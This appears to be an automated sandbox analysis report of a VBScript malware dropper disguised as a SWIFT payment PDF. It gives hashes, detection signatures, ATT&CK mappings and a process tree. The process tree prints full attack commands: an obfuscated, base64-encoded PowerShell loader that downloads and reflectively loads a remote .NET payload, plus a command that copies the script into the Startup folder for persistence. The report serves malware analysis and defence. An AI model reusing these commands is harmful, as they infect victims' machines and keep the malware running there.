167887f979c648809aa8328edba96d972b401f74b06ee5026ea073efd4d9b432

General

Target

SWIFT 103 202414111523339800 111124.pdf.vbs
Size

1KB
MD5

1571d85ecdbd26ac45e3f2639e7e4310
SHA1

b1dd5db95e88132a5052b451b757b9ce486bccc0
SHA256

167887f979c648809aa8328edba96d972b401f74b06ee5026ea073efd4d9b432
SHA512

e0d9a19616e3762c67b0f2d24a92529c3bbd26f01938768c0d213470628df97e7f2bf6aa7c0bdf60018590862e500c1ad6bb6e4b0585b4be47d1b06dd9fb4bcf

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 4 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 2736 WScript.exe
4 2736 WScript.exe
8 624 powershell.exe
9 624 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2584 powershell.exe
2532 powershell.exe
624 powershell.exe

flow	pid	process
3	2736	WScript.exe
4	2736	WScript.exe
8	624	powershell.exe
9	624	powershell.exe

pid	process
2584	powershell.exe
2532	powershell.exe
624	powershell.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXE

pid process

2052 cmd.exe
2692 PING.EXE
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2692 PING.EXE

pid	process
2052	cmd.exe
2692	PING.EXE

pid	process
2692	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2584 powershell.exe
2532 powershell.exe
624 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2584 powershell.exe
Token: SeDebugPrivilege 2532 powershell.exe
Token: SeDebugPrivilege 624 powershell.exe

pid	process
2584	powershell.exe
2532	powershell.exe
624	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	624	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.execmd.exepowershell.exe

description	pid	process	target process
PID 2736 wrote to memory of 2052	2736	WScript.exe	cmd.exe
PID 2736 wrote to memory of 2052	2736	WScript.exe	cmd.exe
PID 2736 wrote to memory of 2052	2736	WScript.exe	cmd.exe
PID 2052 wrote to memory of 2692	2052	cmd.exe	PING.EXE
PID 2052 wrote to memory of 2692	2052	cmd.exe	PING.EXE
PID 2052 wrote to memory of 2692	2052	cmd.exe	PING.EXE
PID 2052 wrote to memory of 2584	2052	cmd.exe	powershell.exe
PID 2052 wrote to memory of 2584	2052	cmd.exe	powershell.exe
PID 2052 wrote to memory of 2584	2052	cmd.exe	powershell.exe
PID 2736 wrote to memory of 2532	2736	WScript.exe	powershell.exe
PID 2736 wrote to memory of 2532	2736	WScript.exe	powershell.exe
PID 2736 wrote to memory of 2532	2736	WScript.exe	powershell.exe
PID 2532 wrote to memory of 624	2532	powershell.exe	powershell.exe
PID 2532 wrote to memory of 624	2532	powershell.exe	powershell.exe
PID 2532 wrote to memory of 624	2532	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202414111523339800 111124.pdf.vbs"
1⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202414111523339800 111124.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202414111523339800 111124.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2584
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzVHJpbkddJFZFcmJvc0VQckVmZVJlbmNFKVsxLDNdKydYJy1qT0luJycpICggKCgnWFpsaW1hZ2VVcmwgPSA0cWpodHRwczovLzEwMTcuZmlsZScrJ21haWwuY29tL2FwaS9maWxlL2dldD9maWxlJysna2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVRLajNMQzZTUXRJY09jX1QzNXcmcGtfdicrJ2lkPWZkNGY2MTRiYjIwOWM2MicrJ2MxNzMnKycwJysnOTQ1MTc2YTA5MDRmIDRxajtYWmx3ZWJDbGllbnQgPSBOZXcnKyctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1habGltYWdlQnl0ZXMgPSBYWmx3ZWJDbGllbnQuRG93bmxvYWREYXRhKFhabGltYWdlVXJsKTtYWmxpbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhYWmxpbWFnZUJ5dGVzKTtYWmxzdGFydEZsYWcgPSA0cWo8PEJBU0U2NF9TVEFSVD4+NHFqO1habGVuZEZsYWcgPSA0cWo8PEJBU0U2NF9FTkQ+PjRxajtYWmwnKydzdGFydEluZGUnKyd4ID0gWFpsaW1hZ2VUZXh0LkluZGV4T2YoWFpsc3RhcnRGbGFnKTtYWmxlbmRJbmRleCA9IFhabGltYWdlVGV4dC5JbmRleE9mKFhabGVuZEZsYWcpO1habHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBYWmxlbmRJbmRleCcrJyAtZ3QgWFpsc3RhcnRJbmRleCcrJztYWmxzdGFydEluZGV4ICs9IFhabHN0YXJ0RmxhZy5MZW5ndGg7WFpsYmFzZTY0TGVuZ3RoID0gWFpsZW5kSScrJ25kZXggLSBYWmxzdGFydEluZGV4O1habGJhc2U2NENvbW1hbmQgPSBYWmxpbWFnZVRleHQuU3ViJysnc3RyaW5nKFhabHN0YXJ0SW5kZScrJ3gsIFhabGJhc2U2NExlbmd0aCk7WFpsYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoWFpsYmFzZTY0Q29tbWFuZC5Ub0NoYScrJ3JBcnJheSgpIHAzayBGb3JFYWNoLU9iamVjdCB7IFhabF8gfSlbLTEuLi0oWFpsYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtYWmxjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFhabGJhc2U2NFJldmVyc2VkKTtYWmxsJysnb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoWFpsY29tbWFuZEJ5dGVzKTtYWmx2YWlNZXRob2QgPSAnKydbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRxalZBJysnSTRxaicrJyk7WFpsdmFpTWV0aG9kLkludm9rZShYWmxudWxsLCBAKDRxajAvTFI5Q2cvZC9lZS5lJysndHNhcC8vOnNwdHRoNHFqLCA0cWpkJysnZXNhdGl2YWRvNHFqLCAnKyc0cWpkZXNhdGl2YWRvNHFqLCA0cWpkZXNhdGl2YWRvNHFqLCA0cWpNU0J1aWxkNHFqLCA0cWpkZXNhdGl2YWRvNHFqLCA0cWpkZXNhdGl2YWRvNHFqLDRxamRlc2F0aXZhZG80cWosNHFqZGVzYXRpdmFkbzRxaiw0cWpkZXNhdGl2YWRvNHFqLDRxamRlc2F0aXZhZG80cWosJysnNHFqZGVzYScrJ3RpdmFkbzRxaiw0cWoxNHFqLDRxamRlc2F0aXZhZG80cWopKTsnKSAgLUNSZVBsQUNlKFtjaEFyXTg4K1tjaEFyXTkwK1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFcGxhY2UnNHFqJyxbY2hBcl0zOSAgLVJFcGxhY2UgJ3AzaycsW2NoQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTrinG]$VErbosEPrEfeRencE)[1,3]+'X'-jOIn'') ( (('XZlimageUrl = 4qjhttps://1017.file'+'mail.com/api/file/get?file'+'key=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_v'+'id=fd4f614bb209c62'+'c173'+'0'+'945176a0904f 4qj;XZlwebClient = New'+'-Object System.Net.WebClient;XZlimageBytes = XZlwebClient.DownloadData(XZlimageUrl);XZlimageText = [System.T'+'ext.Encoding]::UTF8.GetSt'+'ring(XZlimageBytes);XZlstartFlag = 4qj<<BASE64_START>>4qj;XZlendFlag = 4qj<<BASE64_END>>4qj;XZl'+'startInde'+'x = XZlimageText.IndexOf(XZlstartFlag);XZlendIndex = XZlimageText.IndexOf(XZlendFlag);XZlstartIndex -ge 0 -and XZlendIndex'+' -gt XZlstartIndex'+';XZlstartIndex += XZlstartFlag.Length;XZlbase64Length = XZlendI'+'ndex - XZlstartIndex;XZlbase64Command = XZlimageText.Sub'+'string(XZlstartInde'+'x, XZlbase64Length);XZlbase64Reversed = -join (XZlbase64Command.ToCha'+'rArray() p3k ForEach-Object { XZl_ })[-1..-(XZlbase64Command.Length)];XZlcommandBytes = [System.Convert]::FromBase64String(XZlbase64Reversed);XZll'+'oadedAssembly = [System.Reflection.Assembly]::Load(XZlcommandBytes);XZlvaiMethod = '+'[dnlib.IO.Home].GetMethod(4qjVA'+'I4qj'+');XZlvaiMethod.Invoke(XZlnull, @(4qj0/LR9Cg/d/ee.e'+'tsap//:sptth4qj, 4qjd'+'esativado4qj, '+'4qjdesativado4qj, 4qjdesativado4qj, 4qjMSBuild4qj, 4qjdesativado4qj, 4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,'+'4qjdesa'+'tivado4qj,4qj14qj,4qjdesativado4qj));') -CRePlACe([chAr]88+[chAr]90+[chAr]108),[chAr]36 -REplace'4qj',[chAr]39 -REplace 'p3k',[chAr]124) )"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SO1OXMY5PKG783KY4AT7.temp

Filesize
7KB

MD5
44879d817f5df55e22e957f29a703a58

SHA1
2b3d717263efdf0b38d62d5c6a93fa5d08324287

SHA256
b139e059b79209b554ffd87a39e08ad781557fc760e5e5ba14d271b3f07cf132

SHA512
00bf0da6be2c6ed1c15766ad94108ef1b347fe40d137845547b6530977fb13a6fd1810587c5f4c85b92b7f2a7811566f8b856dbb80938e65782f926eb3147096

Download Submit
memory/2532-18-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2532-17-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2584-5-0x000007FEF625E000-0x000007FEF625F000-memory.dmp

Filesize
4KB

Download
memory/2584-6-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2584-7-0x0000000001F80000-0x0000000001F88000-memory.dmp

Filesize
32KB

Download
memory/2584-8-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/2584-10-0x0000000002CCB000-0x0000000002D32000-memory.dmp

Filesize
412KB

Download
memory/2584-11-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/2584-9-0x0000000002CC4000-0x0000000002CC7000-memory.dmp

Filesize
12KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads